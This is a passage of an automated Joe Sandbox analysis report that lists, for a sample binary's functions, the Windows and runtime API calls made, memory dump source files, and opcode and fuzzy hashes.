        • Instruction Fuzzy Hash: 6AE02B7240421C36DF01A760DC0AFAA3AAC9B14389F480061F601E60A2D7B4D6518F61
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
        • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DirectoryLibraryLoadSystem
        • String ID:
        • API String ID: 1175261203-0
        • Opcode ID: e08e7bfd506a5d7042e1d054f581e3613612dad10934247c6bd0b2558f8ed87a
        • Instruction ID: 23e664efbece2f7bef6f02d9fd3de13b81dc193c03ad59e9882159ac364c4e67
        • Opcode Fuzzy Hash: e08e7bfd506a5d7042e1d054f581e3613612dad10934247c6bd0b2558f8ed87a
        • Instruction Fuzzy Hash: 63E04876800228ABDF1197A5DC08FDA776CEF193C2F0400657645D2044DBB4DAC4CBB0
        APIs
        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013B3D9
        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0013B3E0
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: BitmapCreateFromGdipStream
        • String ID:
        • API String ID: 1918208029-0
        • Opcode ID: 9b119490aa4f937da0df48569a297ea24bbe527f68b1f5e6a70d9ec6445c8aec
        • Instruction ID: be36800c55bb2c46e1a3430addb1b2302ed071c11d920b1e6b080cab6d5404f7
        • Opcode Fuzzy Hash: 9b119490aa4f937da0df48569a297ea24bbe527f68b1f5e6a70d9ec6445c8aec
        • Instruction Fuzzy Hash: 54E0ED72904618EBCB14DF99C585699B7E8EB08351F20806EE95997600E374AE049B51
        APIs
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00143D2A
        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00143D35
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Value___vcrt____vcrt_uninitialize_ptd
        • String ID:
        • API String ID: 1660781231-0
        • Opcode ID: d6ffcde683ad1626c13f88c54f1a16fbe59e18f152a9534dc03cb71798024c16
        • Instruction ID: d012d369afd73960d16ef2ef2d6d37200703f8ff0c38ac20030c6a5b853cd858
        • Opcode Fuzzy Hash: d6ffcde683ad1626c13f88c54f1a16fbe59e18f152a9534dc03cb71798024c16
        • Instruction Fuzzy Hash: 75D02276C0471505EC183BF43C0229B2388AB317B1BF02746F070D74F1EF1086003512
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemShowWindow
        • String ID:
        • API String ID: 3351165006-0
        • Opcode ID: d07fcc8ff7584d8865ac9ce7ec2e3bca7d4aff0bc30a270947e8664c0f464ba4
        • Instruction ID: 05c69be265a8681ce479804dc944355c78e108690066f2d18f21b47c839def14
        • Opcode Fuzzy Hash: d07fcc8ff7584d8865ac9ce7ec2e3bca7d4aff0bc30a270947e8664c0f464ba4
        • Instruction Fuzzy Hash: 6DC01236058A00BECB010BB0DC0DE2ABBAAEBA4212F10CA08F0A6C1060C239C150DB11
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 908dacc4579755cddf89ad191bcab33be0edd38a1f17728039aece70555b7c90
        • Instruction ID: 673034474ce9e84f0b245c5b70a74925dd471d567116c1c1c3c7541f00a81e41
        • Opcode Fuzzy Hash: 908dacc4579755cddf89ad191bcab33be0edd38a1f17728039aece70555b7c90
        • Instruction Fuzzy Hash: 64C1B774A00364AFDF25CF24E8C47AD7BA5AF66310F1905B9EC059F396C7309AA4CB61
        APIs
        • __EH_prolog.LIBCMT ref: 001290A7
          • Part of subcall function 001213F8: __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00122032: __EH_prolog.LIBCMT ref: 00122037
          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog$CloseFind
        • String ID:
        • API String ID: 2506663941-0
        • Opcode ID: b84559175dbc4c16ea868321e268292e077d3a5ad408b64cf22bc8c923875d54
        • Instruction ID: b37e1a35f70d89771447dccce142492b5f74cc6d43b22488a2838179cb9191c2
        • Opcode Fuzzy Hash: b84559175dbc4c16ea868321e268292e077d3a5ad408b64cf22bc8c923875d54
        • Instruction Fuzzy Hash: F041BA71D04274AEDB24DB64ECA5AEA7379AF20340F4404EAF58A670C2D7755F99CF10
        APIs
        • __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 0012644D: __EH_prolog.LIBCMT ref: 00126452
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 9104d20dcaf5d2559c6a2411ca04a469f9585ac7beefbec55efbc664bc389039
        • Instruction ID: 087508928159c9abb8a59bbdafecf7defdf1863179ce5c610be8b1f4b23c0e2b
        • Opcode Fuzzy Hash: 9104d20dcaf5d2559c6a2411ca04a469f9585ac7beefbec55efbc664bc389039
        • Instruction Fuzzy Hash: 525126B19063809ECB14DF6994802D9BBE5BF69300F0802BEEC5DCF69BD7755254CB61
        APIs
        • __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 0012644D: __EH_prolog.LIBCMT ref: 00126452
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 33fc2aa177568c26ff1a1d9269790871b7de71cd22cb5591f18020c1f8d543c9
        • Instruction ID: 89df6d6a416a1ad5ef09d0e85a298e9f597932bf43ae32ca9be56a838a148da7
        • Opcode Fuzzy Hash: 33fc2aa177568c26ff1a1d9269790871b7de71cd22cb5591f18020c1f8d543c9
        • Instruction Fuzzy Hash: 475135B19063809EDB14DF6994802D9BBE5BF69300F0802BEEC5DCF69BD7751264CB62
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 3fa06d34a33459b3a9769076c47c82d4c5bafdacce676957a7ec42076b9f5798
        • Instruction ID: c356d5b6b7c98451f85068f8227a6ff7f0a230bded628871f30786c71a36bae2
        • Opcode Fuzzy Hash: 3fa06d34a33459b3a9769076c47c82d4c5bafdacce676957a7ec42076b9f5798
        • Instruction Fuzzy Hash: 072107B1E40215AFDB14DFB4CC4265BBAACFF18754F00413AE615EB681E370AD00C6A8
        APIs
        • __EH_prolog.LIBCMT ref: 0013C20C
          • Part of subcall function 001213F8: __EH_prolog.LIBCMT ref: 001213FD
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 569b29de218a95296bae515f2a3308dd67ce97adf8ee3e57b935363a0e4ffd41
        • Instruction ID: 05e30e378cd646314a65767766259056eb6a2763286b75eb65fc68b90bd9fb71
        • Opcode Fuzzy Hash: 569b29de218a95296bae515f2a3308dd67ce97adf8ee3e57b935363a0e4ffd41
        • Instruction Fuzzy Hash: D3217C71C04229AFCF15DF98D8419EEB7B4BF25304F0004AEE80AB7251E7756A55DBA1
        APIs
        • GetProcAddress.KERNEL32(00000000,00154ADC), ref: 0014BEA8
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc
        • String ID:
        • API String ID: 190572456-0
        • Opcode ID: c634ccb6a157e166beb60f3347ce480af1435bb4d4a2b2278580ea8f4b7dab24
        • Instruction ID: 98f8e8690774754e653da71576fd1adfd43921369d94380380e317ba6d9e861d
        • Opcode Fuzzy Hash: c634ccb6a157e166beb60f3347ce480af1435bb4d4a2b2278580ea8f4b7dab24
        • Instruction Fuzzy Hash: 68110633A041259F9B26DE6CEC808DB73A9EBC43207164220FE54BB264D770EC8187D0
        APIs
        • __EH_prolog.LIBCMT ref: 00128828
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 001333D4: __EH_prolog.LIBCMT ref: 001333D9
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        APIs
        • __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        APIs
        • __EH_prolog.LIBCMT ref: 0013EB97
          • Part of subcall function 0013197C: _wcslen.LIBCMT ref: 00131992
          • Part of subcall function 00128823: __EH_prolog.LIBCMT ref: 00128828
        Similarity
        • API ID: H_prolog$_wcslen
        • String ID:
        • API String ID: 2838827086-0
        APIs
          • Part of subcall function 0014C2E6: RtlAllocateHeap.NTDLL(00000008,00154ADC,00000000,?,0014A5BA,00000001,00000364,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30), ref: 0014C327
        • _free.LIBCMT ref: 0014D695
        Similarity
        • API ID: AllocateHeap_free
        • String ID:
        • API String ID: 614378929-0
        APIs
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        APIs
        • RtlAllocateHeap.NTDLL(00000008,00154ADC,00000000,?,0014A5BA,00000001,00000364,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30), ref: 0014C327
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        APIs
          • Part of subcall function 0012BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BABD
          • Part of subcall function 0012BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAEB
          • Part of subcall function 0012BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAF7
        • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        Similarity
        • API ID: Find$FileFirst$CloseErrorLast
        • String ID:
        • API String ID: 1464966427-0
        APIs
        • SetThreadExecutionState.KERNEL32(00000001), ref: 00132156
        Similarity
        • API ID: ExecutionStateThread
        • String ID:
        • API String ID: 2211380416-0
        APIs
        • GdipAlloc.GDIPLUS(00000010), ref: 0013B62C
          • Part of subcall function 0013B3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013B3D9
        Similarity
        • API ID: Gdip$AllocBitmapCreateFromStream
        • String ID:
        • API String ID: 1915507550-0
        APIs
        • __EH_prolog.LIBCMT ref: 00126925
          • Part of subcall function 001304E5: __EH_prolog.LIBCMT ref: 001304EA
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        APIs
        • DloadProtectSection.DELAYIMP ref: 0013F75F
        Similarity
        • API ID: DloadProtectSection
        • String ID:
        • API String ID: 2203082970-0
        APIs
        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00132E78), ref: 0013EED2
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
        • String ID:
        • API String ID: 3453300979-0
        APIs
        • GetFileType.KERNEL32(000000FF,0012AA1E), ref: 0012AB28
        Similarity
        • API ID: FileType
        • String ID:
        • API String ID: 3081899298-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: df59391b75fe2157329d04d1282a5c0ef793e118c6012da6691025793048aa1d
        • Instruction ID: ba2f42c9c662b1fae9415c1498027cc9a868e2ba705bd094536bc8ef0b190636
        • Opcode Fuzzy Hash: df59391b75fe2157329d04d1282a5c0ef793e118c6012da6691025793048aa1d
        • Instruction Fuzzy Hash: 69B01289669101BCF34871147D06F3B025CC5D0B15770803FF801C4080D7400D06A731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 33c94bea8c4cd945bb916b0a7f66f139c708ae44244bd9b9518cfa908c29f83f
        • Instruction ID: 160b45635765af0321d7ad49e7b0baefff1d826a5c1cf3b0400cb7afc8265e6a
        • Opcode Fuzzy Hash: 33c94bea8c4cd945bb916b0a7f66f139c708ae44244bd9b9518cfa908c29f83f
        • Instruction Fuzzy Hash: F5B01285669001BCF34871147D06F3A021CC5D0B19770C03FF801C4180D7400D0AA731
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: cd8e1a786d52d263aae49111127554d1a1a92da7e6cfb749ed560927c4afbcd3
        • Instruction ID: 89feef2cf0904cd71e18a1725221346507c634af58414913899ac999929bfff8
